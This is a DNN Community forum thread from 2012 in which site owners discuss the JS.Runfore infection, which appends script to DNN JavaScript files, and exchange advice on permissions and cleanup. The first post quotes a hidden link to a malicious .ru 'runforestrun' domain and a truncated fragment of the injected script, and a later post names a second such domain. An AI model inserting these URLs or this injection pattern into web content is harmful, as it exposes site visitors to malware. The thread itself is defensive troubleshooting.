Products

Evoq Content Overview Content Creation Workflow Asset Management Mobile Responsive Personalization Content Analytics SEO Integrations Security Website PerformanceEvoq Engage Overview Community Management  Dashboard  Analytics  Member Profile Gamification Advocate Marketing Community Engagement  Ideas  Answers  Discussions  Groups  Wikis  Events Mobile ReadyDNN Support PackagesEvoq: CMS FeaturesEvoq OnDemandCompare DNN's CMS Products

Solutions

Content Management SystemMulti-Channel PublishingDigital MarketingOnline Community ManagementIntranet Software SolutionOur CustomersPrime

Resources

Test DrivesSchedule A DemoDocumentation CenterWebinarsWhite PapersProduct ManualsRequest PricingData SheetsCase StudiesEvoq Preferred Products Content Management Ecommerce Forms Identity Management and Authentication Site Management Social Themes

Partners

DNN Partners Partner Directory Become a DNN Partner Partner Program Overview  Hosting  Implementation  ISV  Training  Competencies

Community

Participate Ask a Question Forums Community Showcase DNN MVP  Program Overview  Lifetime MVPs  Honorary MVPs Subscribe to DNN Digest Advisory Groups  Awareness Advisory Group  Developer Advisory Group  Partner Advisory Group  Technology Advisory GroupLearn Documentation Wiki Community Blog Video Library Project History Development RoadmapDownload DNN Store Language Packs Manuals Nightly BuildsSecurity Policies Security Center

Blog

About

News Press Releases News Coverage Press KitCareersContact DNN

QA

Ideas Test

New Community Website

Ordinarily, you'd be at the right spot, but we've recently launched a brand new community website... For the community, by the community.

Yay... Take Me to the Community!

Welcome to the DNN Community Forums, your preferred source of online community support for all things related to DNN.
In order to participate you must be a registered DNNizen
HomeHomeDNN Open Source...DNN Open Source...Module ForumsModule ForumsStoreStoreDNN sites infected by this virus JS.RunforeDNN sites infected by this virus JS.Runfore
Previous
 
Next
New Post
6/23/2012 10:09 PM
 
Vitor Duarte


Joined: 4/18/2009
Posts: 3

Today I got a google notification inthe webmaster tool, about 3 sites effected with malware. The virus isfrom this week, so I publish this post to help other people infected,to solve the issue. The virus affect all version of DNN because isinjected by the PC used to administrate the site, add malicious codeto javascript files.

The Virus information ishere:http://www.symantec.com/security_resp...

This is what is visible ant the end ofdefault.aspx using Google Chome inspect tool: a href="http://wmiudbgrcvapriql.ru/runforestrun?sid=cx%22" rel="nofollow" target="_blank">http://wmiudbgrcvapriql.ru/runforestr...style="width: 0px; height: 0px; visibility: hidden;">Infected files :/js/dnncore.js/

/Resources/Shared/scripts/initWidgets.js

/Resources/Shared/Scripts/jquery/jquer...

(looks the virus try to infect all JS files in use in the default.aspx)

This is part of the code add by the virus at the end of the JS files:

/*km0ae9gr6m*/try{q=document.createEl...

Hope this help keep DNN secure!
 
New Post
6/24/2012 3:59 PM
 
Matthias Schlomann


Joined: 8/10/2003
Posts: 3594

The virus could only infected if the system is not configured correctly and had more permissions as it should have. Also security issues on other systems eg hosting systems, FTP server, or not well configured Firewalls could be opened the system to invoke the virus.

Also installing infected Module, provider and Skin packages could be infected a DNN system.  So you should always check and know where are the packages from and if it is from a trusted vendor.

Regards

Matthias

Regards
Matthias
DNN MVP
www.aarsys.de
Metro7 Skin
ShoutCastStats Module for DNN
 
New Post
6/25/2012 4:37 PM
 
Vitor Duarte


Joined: 4/18/2009
Posts: 3
Correct Matthias, this is a Windows vulnerability, not DNN vulnerability!

My hosting company already fixe the servers with the correct Windows patches.

Thank you for your replay.
 
New Post
7/8/2012 2:20 PM
 
Jones


Joined: 3/30/2010
Posts: 10

Hi,

I think I have been infected by this thing as well. Please take a look at my other post here.

This is coming from a "FRESH" install of DNN 6.2. So what you are saying, Matthias Schlomann, is that your own release is infected with the JS.RunFore thingy?

I can see that my infected site is trying to GET this url "ntvrnrdpyoadopbo.ru/runforestrun?sid=botnet2"

Please help me out here. What should I do to clean the site and secure it? My host is webhosting.uk.com, they said that they have patched their systems, so what am I missing here? Could you guide me through the permission settings and other stuff I need to do to secure the site?

Please, please, please - do magic stuff to help me out!

Regards
Jones
 
New Post
7/8/2012 3:37 PM
 
Jones


Joined: 3/30/2010
Posts: 10

Sorry, I didn't read your answer right before Matthias.

I found some info on the webs about the JS.Runfore virus. Seems that the host is to blame for the security holes that allowed it to be introduced into the environment, correct? But that my folder/file permissions allowed it to change the files, correct?

Just so happens to be that I can't change permissions myself - would you please explain to me what permissions I should ask the host to put on my files/folders to avoid problems like this in the future? When I installed DNN, I asked them to the configure permissions according to the installation guide - DotNetNuke_Install_Package_Installation_Instructions_071410.pdf - Guess somethings not quite right yet!

Also, I'm not sure how to recover the site. Just download a new DNN package and overwrite/upload the broken/missing files from the package to the site or should I do a complete re-install of the site?

Regards
Jones
 
 Page 1 of 3
123Next 
Previous
 
Next
HomeHomeDNN Open Source...DNN Open Source...Module ForumsModule ForumsStoreStoreDNN sites infected by this virus JS.RunforeDNN sites infected by this virus JS.Runfore


These Forums are dedicated to discussion of DNN Platform and Evoq Solutions.

For the benefit of the community and to protect the integrity of the ecosystem, please observe the following posting guidelines:

  1. No Advertising. This includes promotion of commercial and non-commercial products or services which are not directly related to DNN.
  2. No vendor trolling / poaching. If someone posts about a vendor issue, allow the vendor or other customers to respond. Any post that looks like trolling / poaching will be removed.
  3. Discussion or promotion of DNN Platform product releases under a different brand name are strictly prohibited.
  4. No Flaming or Trolling.
  5. No Profanity, Racism, or Prejudice.
  6. Site Moderators have the final word on approving / removing a thread or post or comment.
  7. English language posting only, please.
What is Liquid Content?
Find Out
What is Liquid Content?
Find Out
What is Liquid Content?
Find Out